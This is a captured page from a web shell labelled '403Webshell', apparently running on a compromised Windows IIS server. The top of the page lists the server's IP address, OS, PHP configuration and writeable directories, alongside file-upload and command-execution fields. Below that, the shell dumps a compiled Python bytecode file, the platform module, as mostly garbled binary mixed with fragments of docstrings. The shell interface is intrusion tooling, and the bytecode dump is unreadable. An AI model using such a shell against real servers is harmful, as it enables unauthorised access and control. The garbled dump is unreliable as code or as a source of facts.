403Webshell
Server IP : 121.121.20.254  /  Your IP : 216.73.216.202
Web Server : Microsoft-IIS/10.0
System : Windows NT WEB-SERVER 10.0 build 20348 (Windows Server 2022) AMD64
User : IUSR ( 0)
PHP Version : 8.3.28
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/Python315/Lib/__pycache__/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : C:/Python315/Lib/__pycache__/platform.cpython-315.pyc
R
>lqj�c��QsQs]PHs]PHs]PHs]PHs]PHs]PHs]PH"r\
Q]
Q]Q]Q]Q]Q](Q]2Q	]2Q
]�Q]�-
2sQsQHQ
ks
QIQksQJQksQs,QKNs,QLNsQsQsQsQMQksQsQNQks\O2Q,QON2sQPQks\O2QQ2sQQQksQs\OAQ Q!2s!Q"s"QIQ#ks#Q$s$QIQ%ks%\
QQRQQSQQT-2s&\ONPP1Q&ks(Q's)Q(Q)2s*Q*s+Q+Q,\O2Q-Q.22s,Pr-Q/s.Q0s/Q1s0Q2s1Q3s2Q4s3Q5s4-s5QUQ6ks6Q7s7Q8s8Q9s9Q:s:Q;s;Q<s<Q=s=-s>QVQ>ks?QWs@PrAQ?sBQ@sCQAsDQBQCksEQUQDQEkksFQFsG\HQG6Xc
\F2P!P!\	cPrCKhh9h)Xa&This module tries to retrieve as much platform-identifying data as
possible. It makes this information available via function APIs.

If called from the command line, it prints the platform
information concatenated as single string to stdout. The output
format is usable as part of a filename.

a
    Copyright (c) 1999-2000, Marc-Andre Lemburg; mailto:mal@lemburg.com
    Copyright (c) 2000-2010, eGenix.com Software GmbH; mailto:info@egenix.com

    Permission to use, copy, modify, and distribute this software and its
    documentation for any purpose and without fee or royalty is hereby granted,
    provided that the above copyright notice appear in all copies and that
    both that copyright notice and this permission notice appear in
    supporting documentation or portions thereof, including modifications,
    that you make.

    EGENIX.COM SOFTWARE GMBH DISCLAIMS ALL WARRANTIES WITH REGARD TO
    THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND
    FITNESS, IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL,
    INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING
    FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT,
    NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION
    WITH THE USE OR PERFORMANCE OF THIS SOFTWARE !

�dev�alpha�a�beta�b�c�RC�rc�pl�pc��[OQ2o,oUOU2FD-oUQ7fJ[U]
2o]doUOVC12J/	U![c[
O
S]2oK;h9h)z([0-9]+|[._+-])z._+-)�re�compile�split�int�
ValueError�_ver_stages�get�extend)�version�component_re�result�v�ts&    �C:\Python315\\Lib\platform.py�_comparable_versionr�s���:�:�0�1�L�
�F�
�
�
��
(���F�?�
*���2�J����
�M�M�1�&�!�)��M���
*��O�O�A�q�)��
*�s�A�	B�)B�Bc���U%f�[OQ6Xc4QOQ[OO22oQU1![
OQ2oUO]Q5o[U2]6Xc[U2![OoU%fV1![OQ[O [O"*2o[$o[
O&O)U2oPo[+UQ29^tt^2oUO-U2o	]o
U
[U	26Cc�QU	7fQ	U	7fQ
U	7cUO/V�2oLPoU%cUO12[U	26XcNUO-U2oU%c+U	[3U
[U	2Q*
2PU*o	]o
J�U%fCLEUO52T
t,tFDo
U
dU
O7Q2LS
MJ	oo
Uv
ooooooooooU%cU%fQ
oL�U%c#UQ6wcQoSoL�UU2UU26�cSoL�U%cUUQ7cMQ
oU%cU%cUU2UU26�cSoU%cU[U2'PU6wc
UU*oLWU%c!QoU%cUU2UU26�cSoL/U%c(QoU%cU%cUU2UU26�cSoUO12o
CJ�PPP2XeU1!S1![[[1cCK�h9htto
h)%fhK<9h)a�Tries to determine the libc version that the file executable
(which defaults to the Python interpreter) is linked against.

Returns a tuple of strings (lib,version) which default to the
given parameters in case the lookup fails.

Note that the function has intimate knowledge of how different
libc versions add symbols to the executable and thus is probably
only usable for executables compiled using gcc.

The file is read and scanned in chunks of chunksize bytes.

�
emscripten�.c3�D�SF �Do[U2w�	J	P!3h�N)�str��.0�xs& r�	<genexpr>�libc_ver.<locals>.<genexpr>�s��+R���+R�a�3�q�6�6�+R�s� �CS_GNU_LIBC_VERSION)�maxsplits�
          (__libc_init)
        | (GLIBC_([0-9.]+))
        | (libc(_\w+)?\.so(?:\.(\d[0-9.]*))?)
        | (musl-([0-9.]+))
        | ((?:libc\.|ld-)musl(?:-\w+)?.so(?:\.(\d[0-9.]*))?)
        �rbslibcsGLIBCsmusl���latin1�libc�glibc�musl)r,r-)�sys�platform�join�_emscripten_info�emscripten_version�os�confstrr�len�tuple�AttributeErrorr�OSError�
executablerr
�ASCII�VERBOSEr�path�realpath�open�read�search�end�max�groups�decode)r9�libr�	chunksize�ver�parts�libc_search�V�f�binary�pos�m�chunk�s�decoded_groups�libcinitr,�glibcversion�so�threads�	soversionr-�muslversion�musl_so�
musl_sovers&&&&                     r�libc_verrZ�s�����<�<�<�'��(�(�S�3�+?�+?�+R�+R�S�S�C� �#�&�&�	��*�*�2�3�C��I�I�q�I�)�E��5�z�Q���U�|�#���^�^�
���<���*�*��	���2�:�:���K�	�A����!�!�*�-�J�
�C�	
�j�$�	�	�1����	�"�����C��K���&� �H��$6�'�V�:K��&�&�v�3���������3�v�;�.����y�)���#�C��S��[�4�-?�$@�$A�B�U�J�F��C����'(�x�x�z�3�'1�!�56�M�a�h�h�x�0�q�H�'1�
�3�8F�
5�X�u�l�B���
�;���������'�>�!�C�&�C��|�_�q��v�-�&�C����/�/� �C� �#��9���#��1F�'���3��G��}�~�#6�'�#A�!�G�m�������a��n�q��v�5�%�C������s�a�
�m�a��f�.D�$�C��%�%�'�C�W
 �X�;��/�/�C�/�/��K�
�G�4�	��	��R3�!
 �	�s��7L?�
L?�'$M!�M!�M!�M!�!M!�=M!�M!�41M!�&M!�9
M�M�M!�2M!�:
M!�M!�M!�$
M!�/M!�6	M!�M!�M!�	M!�%M!�9M!�	M!�M!�(
M!�3	M!�=M!�M!�M!�?M�M�M�M!�!M1	�*M1	c	��UOQ2oU%cUOU2[[[[[
U222oQOUQ*2oU![cSoK)h9h)zNormalize the version and build strings and return a single
version string using the format major.minor.build (or patchlevel).
r�N�N)r�append�list�mapr rrr0)r�build�l�stringss&&  r�
_norm_versionrdsk��
	�
�
�c��A��	�������s�3��C���,�-���h�h�w�r�{�#�G��N�������s�'A.�.	A>�8A>�=A>�win32�win16�dosc��[OU7cVU1!]PH
oQFD0oUOUUOUOP	QP	Q5oL	VU1![OQ2oUO2oUOU2oUdEUO2vqoUP*Q6XcUPPoUP*Q6XcUPPo[U2oVU1![
SO1cJ�h9h)z�Tries to figure out the OS version used and returns
a tuple (system, release, version).

It uses the "ver" shell command for this which is known
to exists on Windows, DOS. XXX Others too ?

In case this fails, the given parameters are used as
defaults.

�locale)�stdin�stderr�text�encoding�shellz'(?:([\w ]+) ([\w.]+) .*\[.* ([\d.]+)\])r)rGzcommand /c verz
cmd /c ver)
r.r/�
subprocess�check_output�DEVNULLr8�CalledProcessErrorrr
�strip�matchrCrd)	�system�releaser�supported_platformsro�cmd�info�
ver_outputrNs	&&&&     r�_syscmd_verr{s���|�|�.�.���'�'��6��
	��*�*�3�1;�1C�1C�2<�2D�2D�04�4<�15�+�7�D�
�7���'�'����-�.�J�
�:�:�<�D������A��}�#$�8�8�:� ����2�;�#���c�r�l�G��2�;�#���c�r�l�G� ��(���G�#�#��1��6�6�7�	��	�s�+C�C8�3C8�7C8c�`�[%f[Q2gQQQQ-U*o[OQOQO	U2U22OQ2oQU2oSTt-tFDpD]*U]*aJ	tonU1Q	kU2![cPr[Q2gh9httoh)
z
not supported�OS�Win32_OperatingSystem�CPU�Win32_ProcessorzSELECT {} FROM {}�,�c3�N�SF �DpOQ2w�	J	P!3h)�=)�	partition)r"�is& rr$�_wmi_query.<locals>.<genexpr>_s��D���D�q�+�+�c�"�"�D�s�%c3�B:�SF �DoRU*w�	J	P!3hr�)r"�k�	dict_datas& �rr$r�as��$���$�Q�I�a�L�L�$�s�)�_wmir8�
exec_query�formatr0r)�table�keys�data�
split_datar�r�s&*   @r�
_wmi_queryr�Os�����4��o�&�&��%�
� �
��

�E�'����2�9�9��H�H�T�N�� 
���5��;�	
�2�D�1�J�%/�0�Z��1��q��t��Z�0�I�'�$�'�'���'����o�&�&�'��1s�AB �7B<� 	B9�*B9c��[2Q7!)�IoTUAP)r��
NanoServer�WindowsCoreHeadless�	IoTEdgeOS)�
win32_editionr��r�win32_is_iotr��s���?�Z�Z�Zr�c��]PHoQoUOUOU29^tt^2oUOUQ2]*ttPPP2!)%fhP!9h[cP!h9h[
cP!h9h)��,SOFTWARE\Microsoft\Windows NT\CurrentVersion�	EditionId)�winreg�	OpenKeyEx�HKEY_LOCAL_MACHINE�QueryValueExr8�ImportError)r��cvkey�keys   rr�r��s���
��	�C�E��!�!�&�";�";�U�C�C�s��*�*�3��<�Q�?�D�C�C�C�
���	���	���
���
�sQ�A8�&A&�A�
A&�A#	�A#	�A&�#A&�&	A5�0A5�4A5�8	B�B�Bc���[QQQQQQ2vqq$o[U2]6HoU%cUQ6wc
QUQU0oLQU0oVV&1![cLh9h]Q	HGoL[
c	XSP	1t!h9hS2o[
SQ
]2]6Ho[2]*o[[SOQ22vq�oLC[c6SO9%f
SQ*vq�oQOX�S2oLh9hSQ
*X�16XcMQOSO2oL/[c"SQ*Q6XcQSQ**oLh9h]PH>oQo
SO!SO"S
29^tt^2oSO%SQ2]*oPPP2L5)%fhL%9h[cLh9h[
cLh9hXX&1!)r}�Version�ProductType�	BuildType�ServicePackMajorVersion�ServicePackMinorVersion�0�SPr)�getwindowsversion�product_typer\z{0}.{1}.{2}:N�NzSP{}:N�
Nz
Service Pack :r�NNr��CurrentType)r�rr8r.r�r��getattrr{r`rr�platform_versionr��service_pack_majorr7r�r�r�r�)r�csd�ptyper��spmajor�spminor�	is_clientr��winver�major�minorrar�r�r�s&&&            r�
_win32_verr��s���
�<F�����%�%�
=
�8������&�!�+�	��w�#�~��w�i�q��	�*�C��w�i�.�C��U�-�-���
��
��)�)���)��U�D�(�(�)���
 �F�����3�q�8�I�<��-��"��!�#�w�}�}�S�'9�:���e���<�$�5�5�C�C������e��&�&�u�U�;��<���b�z�e�^�#�	&��-�-�� 9� 9�:�C���	&��3�x�?�*��S��X�o���	&��
��	�C�E��!�!�&�";�";�U�C�C�s��+�+�C��?��B��D�C�C�C���	��	���
��
����)�)s��)A�A�A�	A�A�A�A�	A2�)A2�1A2�
3C�	D�D�D�D�D0�0	E�:E�	E�E� G�%&G�F.�%G�.F>	�7F>	�9G�>G�	G�G�G�	G �G �G c��`�P
o[VU2vqq4U%cR[[[UO	Q222nU%c[
L[o[U1QkU2U2oVV#1!)Frc3�J:�SF �DvqUR6:fJUw�	J	P!3hrr�)r"r�r�
intversions&  �rr$�win32_ver.<locals>.<genexpr>�s��h���h�d�a�!�z�/���h�s�#�#)r�r6r`rr�_WIN32_CLIENT_RELEASES�_WIN32_SERVER_RELEASES�next)rvrr�r�r��releasesr�s&&&&  @r�	win32_verr��s^����I�%/��e�%D�"�G�%���3�s�G�M�M�#�$6�7�8�
�-6�)�<R���B�h�B�G�L���S�'�'r�c�t�Qo[OOU2%fP!]PHo[UQ29^tt^2oUO
U2oPPP2WQ*oQo[O2OoUQ7cQoVEU1![cP!h9h)%fhKY9h)z0/System/Library/CoreServices/SystemVersion.plistr(�ProductVersion�PowerPC��r�r�)�ppczPower Macintosh)	r3r<�exists�plistlibr�r>�load�uname�machine)�fnr�rKr	rv�versioninfor�s       r�_mac_ver_xmlr��s���	;�B�
�7�7�>�>�"������
�b�$���1�
�]�]�1�
��
��!�"�G��K��h�h�j� � �G��,�,�����(�(�������
��s)�B�B'�	B$�B$�#B$�'B7	�0B7	c�,�[2oUdU!VU1!)aGet macOS version information and return it as tuple (release,
versioninfo, machine) with versioninfo being a tuple (version,
dev_stage, non_release_version).

Entries which cannot be determined are set to the parameter values
which default to ''. All tuple entries are strings.
)r�)rvr�r�rys&&& r�mac_verr��s#���>�D�������(�(r��IOSVersionInfoc��[OQ6Xc#]PH
oUO2oUd[	U![	VV#2!)z�Get iOS version information, and return it as a namedtuple:
    (system, release, model, is_simulator).

If values can't be determined, they are set to values provided as
parameters.
�ios)r.r/�_ios_support�get_platform_iosr�)rurv�model�is_simulatorr�rs&&&&  r�ios_verr�s?���|�|�u����.�.�0����!�6�*�*��&�5�?�?r��
AndroidVerz7release api_level manufacturer model device is_emulatorc�J`	`
�[OQ6Xco]QH
GoGoGn	[
UQ2Q2n
Vw1R
mU	U
1QkoUQU2o[UQU22oUQU2oUQU2oUQ	U2oUQ
Q2Q6Ho[VV#VE2![cKh9h)
�android)�CDLL�c_char_p�create_string_bufferzlibc.so�__system_property_getc�:�]\oRU2oRUOQ2U2oU]6XcU!UOOQQ2!)�\zUTF-8�backslashreplace)�encode�valuerD)�name�default�PROP_VALUE_MAX�buffer�lengthr��system_property_gets&&   ��r�getprop�android_ver.<locals>.getprop,sM���!#��-�n�=��,�T�[�[��-A�6�J���Q�;�#�N�!�<�<�.�.�w�8J�K�Kr�zro.build.version.releasezro.build.version.sdkzro.product.manufacturerzro.product.modelzro.product.devicezro.kernel.qemur��1)r.r/�ctypesr�r�r�r��argtypesrr�r�)rv�	api_level�manufacturerr��device�is_emulatorr�r�r�r�r�s&&&&&&   @@r�android_verr�s����
�|�|�y� �	@�C�C�#*�$�y�/�;R�"S��,4�+?��(�

L��8�'�B�G��G�$:�I�F�G�I�"�#<�l�K�L��.��6�E��0�&�9�F�!�"2�C�8�C�?�K���L��F�F��9�	��	�s�
B�	B"�B"�!B"c�&�UQ6XcmUQ6cVU1!UOQ2oU%c<[U]*2oU]*
o[U2U]$QOU2oUQ6cQoLQoL	UQ7cQoVU1![cK'h9h)z�Returns (system, release, version) aliased to common
marketing names used for some systems.

It also does some reordering of the information in some cases
where it would otherwise cause confusion.

�SunOS�5r�6�Solaris�Windows�rerf)rrr r0r)rurvrrbr�s&&&  r�system_aliasrEs�������S�=��G�+�+��M�M�#����
&��A�a�D�	����	���5�z��!���(�(�1�+���S�=��F��F�	�%�	%���
�G�#�#��'�
��
�s�B�	B�B�Bz /\:;"()z_-------c���QOQ[[U222oUO[2oUOQP2o[OQQU2OQ2!)zdHelper to format the platform string in a filename
compatible format e.g. "system-version-machine".
�-c3�L�SF �DpO2w�	J	P!3hr)rsr!s& rr$�_platform.<locals>.<genexpr>xs��+<���+<�a���	�	�+<�s�$�unknownz-{2,})	r0�filterr5�	translate�_SIMPLE_SUBSTITUTIONS�replacer�sub�rstrip)�argsr/s* r�	_platformrrsf���x�x�=�6�#�t�+<�=�=�H��!�!�"7�8�H����	�2�.�H��6�6�(�C��*�1�1�#�6�6r�c�|�]PHoUO2![cSt!h9h[cSt!h9h)z7Helper to determine the node name of this machine.
    )�socketr��gethostnamer8)r�rs& r�_noder�sI������!�!�#�#��	������
�����s ��+�	(�(�(�	;�;�;c�p�[OOU2o[OOU2%cq[OO	[OO[OO
U2[OU222oJ�U!)zGIn case filepath is a symlink, follow it until a
real file is reached.
)r3r<�abspath�islink�normpathr0�dirname�readlink)�filepaths&r�_follow_symlinksr�sk��
�w�w���x�(�H�
�'�'�.�.��
"�
"��7�7�#�#��G�G�L�L�������2�B�K�K��4I�J�L���Or�c�f�[OQ7cU!]PH
o[	U2o[[OQQ5oUOQQU,UOUQ5oU%fU!UOQ2![cSt!h9h[SO1cSt!h9h)z�Interface to the system's file command.

The function uses the -b option of the file command to have it
omit the filename in its output. Follow the symlinks. It returns
default in case the command should fail.

�C)�LC_ALL�filez-b)rk�envzlatin-1>rgr��tvosrfre�watchos)
r.r/ror�r�dictr3�environrprqr8rrrD)�targetr�ror#�outputs&&   r�_syscmd_filer*�s����|�|�J�J������f�
%�F��r�z�z�#�
&�C���(�(�&�$��)?�0:�0B�0B�-0�)�2��
����=�=��#�#��#������
�Z�2�2�3�����s/�B�!B�	B�B�B�B0�*B0�/B0c�T�U%f/]PHoUOQ2o[U]*2Q*oU%c[UP2oLPoU%fcU[O
6XcN[O[7c2[[O*vqgU%cSoU%cSoV1!QU7cQU7cV1!QU7cQoL	QU7cQoQ	U7cQ	oV1!Q
U7cQ
oV1!QU7cQU7cQ
oV1!QoV1!QU7cQoV1!QU7cQoV1!V1!)a'Queries the given executable (defaults to the Python interpreter
binary) for various architecture information.

Returns a tuple (bits, linkage) which contains information about
the bit architecture and the linkage format used for the
executable. Both values are returned as strings.

Values that cannot be determined are returned as given by the
parameter presets. If bits is given as '', the sizeof(pointer)
(or sizeof(long) on Python version < 1.5.2) is used as
indicator for the supported pointer size.

The function relies on the system's "file" command to do the
actual work. This is available on most if not all Unix
platforms. On some non-Unix platforms where the "file" command
does not exist and the executable is set to the Python interpreter
binary defaults from _default_architecture are used.

�P�bitr9z
shared objectz32-bit�32bitz64-bit�64bit�ELFzMach-O�PEr�	WindowsPE�COFFzMS-DOS�MSDOS)�struct�calcsizer r*r.r9r/�_default_architecture)r9�bits�linkager5�size�fileoutrrbs&&&     r�architecturer<�s[��.�����s�#���4�!�8�}�u�$����z�2�.������S�^�^�#��<�<�0�0�(����6�D�A��������}���7�"��g�'E��}���7����	�W�	���
�����"�=��!
�W�	����=��
������!�G��=���G��=��
�7�	����=��

�W�	���
�=��	
��=�r�c�@�[QQ2uq,QN[U2*oU%cU![
OOQP29%f![
OOQP2![[1cK[h9h[cKlh9h)r�Architecture�PROCESSOR_ARCHITEW6432�PROCESSOR_ARCHITECTURE)
�x86�MIPS�Alphar�N�ARM�ia64NN�AMD64NN�ARM64)r�rr�
IndexErrorr8r3r'r)�arch�_s  r�_get_machine_win32rKs������~�6�
��		���$�i��D�����	�
�
���/��4�	5�	5�
�
�
���/��4����J�'�	��	���
��
�s.�
B�A8�8B�B�B�	B�B�Bc�J`�\sQsQsn\Q2sQsQsQsQs	Qs
UsP!)�
_Processor�4c�v�[UQ[O0UO2oU29%fP!)�get_)r�r.r/�from_subprocess)�cls�funcs& rr�_Processor.get5s/���s�d�3�<�<�.�1�3�3F�3F�G���v�|�|��r�c��[QQQ2vqUQU0![c,[OO	Q[22t!h9h)r�Manufacturer�Caption�, �PROCESSOR_IDENTIFIER)r�r8r3r'rrK)r��captions  r�	get_win32�_Processor.get_win32:sX��	0�$.�u�n�i�$P�!�L��Y�b���/�/���	P��:�:�>�>�"8�:L�:N�O�O�	P�s��	A�)A�Ac�p�]PHoUOQ]2vqU]�6�cQ!Q![cP!h9h)r�zSYI$_CPUrC�VAX)�vms_lib�getsyir�)r_�csid�
cpu_numbers   r�get_OpenVMS�_Processor.get_OpenVMSBsE��	;�� '�~�~�j�!�<��D�(�C�/�7�:�U�:��	�	��	�s�&�	5�5�5c��[OOOQ2%c [O
2O!Q!)�	simulator�arm64)r.�implementation�
_multiarch�endswithr3r�r�r�r�r�get_ios�_Processor.get_iosNs4�����(�(�1�1�+�>�>��8�8�:�%�%�%�r�c���]PHoUOQQ,UOP	QQ5O	2![cP!h9h[
SO1cP!h9h)z
Fall back to `uname -p`
r�z-p�utf8)rkrlrm)ror�rprqrsr8rr)ros rrQ�_Processor.from_subprocessSsx��	��	��*�*��$��!�)�)���	+��
�e�g�
���	��	����6�6�7�	��	�s,�7�.A	�	A�A�A�	A$�A$�#A$r�)�__name__�
__module__�__qualname__�__firstlineno__�classmethodrr[rcrkrQ�__static_attributes__�__classdictcell__)�
__classdict__s@rrMrM4s0��������0�;��
�r�rMc��UQ6XcP!S!)r
r�)�vals&r�_unknown_as_blankrzfs���	�!�2�*�s�*r�c�``�\sQsQsnQsQ
s\OQ2sU1Qks	\
Q2sQsQs
QsQ	sUsU9s!)�uname_result�lz�
A uname_result that's largely compatible with a
simple namedtuple except that 'processor' is
resolved late and cached to avoid calling "uname"
except when needed.
c�>�[[O22!r)rzrMr��selfs&r�	processor�uname_result.processorzs�� ����!1�2�2r�c�b:�[O[RU_
2UO12!r)�	itertools�chain�super�__iter__r�)r��	__class__s&�rr��uname_result.__iter__~s)�������G���
�^�^��
�	
r�c���[UO2]*
oUOU,UN3o[U2U]*6wcQUQ[U20o[U2gU!)�z	Expected z arguments, got )r5�_fields�__new__�	TypeError)rR�iterable�
num_fieldsr�msgs&&   r�_make�uname_result._make�s`������%��)�
����S�,�8�,���v�;�*�q�.�(��j�\�)9�#�f�+��G�C��C�.� ��
r�c�(�[U2U*!r)r6)r�r�s&&r�__getitem__�uname_result.__getitem__�s���T�{�3��r�c�>�[[[U222!r)r5r6�iterrs&r�__len__�uname_result.__len__�s���5��d��$�%�%r�c�`�[[U2P[UO2]*
1!r)r|r6r5r�rs&r�
__reduce__�uname_result.__reduce__�s'���U�4�[�)?�#�d�l�l�*;�a�*?�@�@�@r�r�)ru�nodervrr�r�)rprqrrrs�__doc__r��	functools�cached_propertyr�r�rtr�r�r�r�rurv�
__classcell__)r�rws@@rr|r|lsY����
�O�G����3��3�
����� �&�A�Ar�r|�uname_result_basez#system node release version machinec�8�[d[![O29vqq#qE[U2%f�UQ6Xc"[2vq#qgS9%f[2oU%c	U%f<[U2vqoUQ6XcQoL#UQ6XcUQ6XcQoQUQ*6XcQoLPoUQ7cU%f
UQ6XcQoLQ	oQoUQ
6XcU%cUQ6XcSoPoUQ6XcUQ6XcQoQo[O
Q6XcQ
o[2Oo[O
Q6Xc[2vqoVV#U1o	[[[ U	2r[![c&[O
o[
2oP9o9q4QoCKmh9h)aAFairly portable uname interface. Returns a tuple
of strings (system, node, release, version, machine, processor)
identifying the underlying platform.

Note that unlike the os.uname function this also returns
possible processor information as an additional tuple entry.

Entries which cannot be determined are set to ''.

rezMicrosoft Windowsr�	Microsoftz6.0r\�Vistar.�16bit�OpenVMSr�r��Androidr�r�r)�_uname_cacher3r�r7r.r/r�anyr�rKr{r�rvr�r|r`rz)
rur�rvrr��infosr�r�rJ�valss
          rr�r��s��������:<�(�(�*�D�/��g���u�:�:��W��+4�;�(�G�c��5�5�!3�!5�G��G�'2�6�':�$�F�W��,�,�"���;�&�7�i�+?�
#���G�B�K�'�%�G� �G��'�'���W�$�%�G�%�G��F�����'�S�.��G��G�����I�!5������|�|�y� ����-�'�'���|�|�u�� '�	����A���7�2�D���%6��!=�>�L����G�������w��&(�(��(�'���	�s�E)�)	F�3"F�Fc�,�[2O!)z�Returns the system/OS name, e.g. 'Linux', 'Windows' or 'Java'.

An empty string is returned if the value cannot be determined.

)r�rur�r�rruru�s���7�>�>�r�c�,�[2O!)z�Returns the computer's network name (which may not be fully
qualified)

An empty string is returned if the value cannot be determined.

)r�r�r�r�rr�r��s���7�<�<�r�c�,�[2O!)ztReturns the system's release, e.g. '2.2.0' or 'NT'

An empty string is returned if the value cannot be determined.

)r�rvr�r�rrvrv	����7�?�?�r�c�,�[2O!)zzReturns the system's release version, e.g. '#3 on degas'

An empty string is returned if the value cannot be determined.

)r�rr�r�rrrr�r�c�,�[2O!)zgReturns the machine type, e.g. 'i386'

An empty string is returned if the value cannot be determined.

)r�r�r�r�rr�r�r�r�c�,�[2O!)z�Returns the (true) processor name, e.g. 'amdk6'

An empty string is returned if the value cannot be
determined. Note that many platforms do not provide this
information or simply return the same value as for machine(),
e.g.  NetBSD does this.

)r�r�r�r�rr�r�$s���7���r�c���Ue[Oo[OUP2oUdU![OOQ2%c�[OQ[O2oQoUOU2oUe[Q[U2*2gUO2vqVqxo	UePo[Oo
L�QU7c_[OQ2oQoUOU2oUe[Q[U2*2gUO2vqVqxPo
L�[OQ[O2oUOU2oUe[Q	[U2*2gUO2vqVqxo
Q
oUePoLU%cUQ*U*o[2%c[Ovq�oL.[
2%c[Ovq�oLPo
PoUO!Q2o[#U2]6Xc#UO%Q2QO'U2oV5V�VgU
1oU[U$U!)avReturns a parsed version of Python's sys.version as tuple
(name, version, branch, revision, buildno, builddate, compiler)
referring to the Python implementation name, version, branch,
revision, build number, build date/time as string and the compiler
identification string.

Note that unlike the Python sys.version, the returned value
for the Python version will always include the patchlevel (it
defaults to '.0').

The function returns empty strings for tuple entries that
cannot be determined.

sys_version may be given to parse an alternative version
string, e.g. if the version was read from a different Python
interpreter.

�javazL([\w.+]+)\s*\(#?([^,]+)(?:,\s*([\w ]*)(?:,\s*([\w :]*))?)?\)\s*\[([^\]]+)\]?�Jythonz&failed to parse Jython sys.version: %s�PyPyzE([\w.+]+)\s*\(#?([^,]+),\s*([\w ]+),\s*([\w :]+)\)\s*\[PyPy [^\]]+\]?z$failed to parse PyPy sys.version: %szh([\w.+]+)\s*(?:free-threading build\s+)?\(#?([^,]+)(?:,\s*([\w ]*)(?:,\s*([\w :]*))?)?\)\s*\[([^\]]+)\]?z'failed to parse CPython sys.version: %s�CPython� �_git�
_mercurialrr�)r.r�_sys_version_cacherr/�
startswithrr
r:rtr�reprrC�hasattrr�r�rr5r^r0)�sys_versionr�jython_sys_version_parserr�rtr�buildno�	builddate�	buildtimerJ�compiler�pypy_sys_version_parser�cpython_sys_version_parser�branch�revisionrbs&               r�_sys_versionr�4sL��*���k�k�� �
#�
#�K��
6�F�
���
�
�|�|���v�&�&�$&�J�J�
�!�h�h�%(�!���)�/�/��<���=��8��[�!�"�#�
#�5:�L�L�N�1��)�����I��<�<��	�;�	�"$�*�*�
 �#!��
��'�-�-�k�:���=��C�!�+�.�/�0�
0�16����.��)���&(�Z�Z�
�
!�h�h�
&(�"�+�0�0��=���=��9��[�!�"�#�
#��l�l�n�	9��)�������I�
�!�C��)�3�I��s�F���!�h�h���8�	��l�	#�	#�!�n�n���8�����	�
�
�c��A�
�1�v��{�	����
��(�(�1�+���V�w�8�
L�F�&,��{�#��Mr�c�&�[2]*!)z�Returns a string identifying the Python implementation.

Currently, the following implementations are identified:
  'CPython' (C implementation of Python),
  'Jython' (Java implementation of Python),
  'PyPy' (Python implementation of Python).

�r�r�r�r�python_implementationr��s���>�!��r�c�&�[2]*!)z�Returns the Python version as string 'major.minor.patchlevel'

Note that unlike the Python sys.version, the returned value
will always include the patchlevel (it defaults to 0).

r�r�r�r�python_versionr��s���>�!��r�c�V�[[2]*OQ22!)z�Returns the Python version as tuple (major, minor, patchlevel)
of strings.

Note that unlike the Python sys.version, the returned value
will always include the patchlevel (it defaults to 0).

r)r6r�rr�r�r�python_version_tupler��s!������"�(�(��-�.�.r�c�&�[2]*!)z�Returns a string identifying the Python implementation
branch.

For CPython this is the SCM branch from which the
Python binary was built.

If not available, an empty string is returned.

r�r�r�r�
python_branchr��s���>�!��r�c�&�[2]*!)z�Returns a string identifying the Python implementation
revision.

For CPython this is the SCM revision from which the
Python binary was built.

If not available, an empty string is returned.

r�r�r�r�python_revisionr��s���>�!��r�c�&�[2Q*!)z[Returns a tuple (buildno, builddate) stating the Python
build number and date as strings.

:��Nr�r�r�r�python_buildr��s���>�#��r�c�&�[2]*!)zFReturns a string identifying the compiler used for compiling
Python.

r�r�r�r�python_compilerr��s���>�!��r�c	�~�[OV1P2oUdU![2vq4qVqxVx6XcPoU%c[V5U2vq5oUQ6XcB[O
Q6Xc[
2vq5o	L[2]*o
U
%cQoS
oUQ6Xc0[U2vq�q�U%c
[V52oLv[V5Vm2oLiUQ6Xc$[2voo[V5VxQUU*2oL?U%c
[V52oL+[[O2voo[V5UUUU2oU[V1$U!)anReturns a single string identifying the underlying platform
with as much useful information as possible (but no more :).

The output is intended to be human readable rather than
machine parseable. It may look different on different
platforms and this is intended.

If "aliased" is true, the function will use aliases for
various platforms that report system names which differ from
their common names, e.g. SunOS will be reported as
Solaris. The system_alias() function is used to implement
this.

Setting terse to true causes the function to return only the
absolute minimum information needed to identify the platform.

�Darwinr��macOSr�Linux�with)
�_platform_cacherr�rr.r/r�r�r�rrZr<r9)�aliased�terserrur�rvrr�r�rJ�
macos_release�rel�versr�r�r/�libcname�libcversionr8r9s&&                  rr/r/�s4��&�
 �
 �'�!1�4�
8�F�
���
�:?��6�F�'�G����	��#/���#I� ���
����<�<�5� �$+�I�!�F�Q��#�I�a�L�M�� ��'��
��� )�'� 2���3�� ��1�H� ��'�?�H�	�7�	� (�
���+��V�g�#�%�k�1�3��� ��1�H�(����8�M�D�'� ��'�!*�D�'�;�H�)1�O�W�$�%��Or�c��QQQQQQ-o[OQ2o[OQ2oSFDLoUOU2oUeJUOQUO	Q22VO	Q	2$JN	U!)
�NAMEr��ID�linux�PRETTY_NAMEzA^(?P<name>[a-zA-Z0-9_]+)=(?P<quote>["']?)(?P<value>.*)(?P=quote)$z\\([\\\$\"\'`])z\1r�r�)rr
rtr�group)�linesry�os_release_line�os_release_unescape�line�mos&     r�_parse_os_releaser�8s���	���g��w��D��j�j�M��O��*�*�%7�8����
�
"�
"�4�
(��
�>�%8�%<�%<��r�x�x��(�&�D���&�!�"���Kr�c	��[eqPo[FDAo[UQQ59^tt^2o[U2rPPP2[O2!	[	UQQO
[202g[O2!)%fhK^9h[coSO
oPo=J�Po=hh9h)zKReturn operation system identification from freedesktop.org os-release
    zutf-8)rmzUnable to read files rX)�_os_release_cache�_os_release_candidatesr>r�r8�errnor0�copy)r��	candidaterK�es    r�freedesktop_os_releaser�Ss���
� ���/�/�I�
 ��)�g�6�6�!�(9�!�(<�%�7���!�!�#�#�0���'��	�	�2H�(I�'J�K��
�
�!�!�#�#�7�6���
 ������
 �s9�B!�B	�B!�B
�B
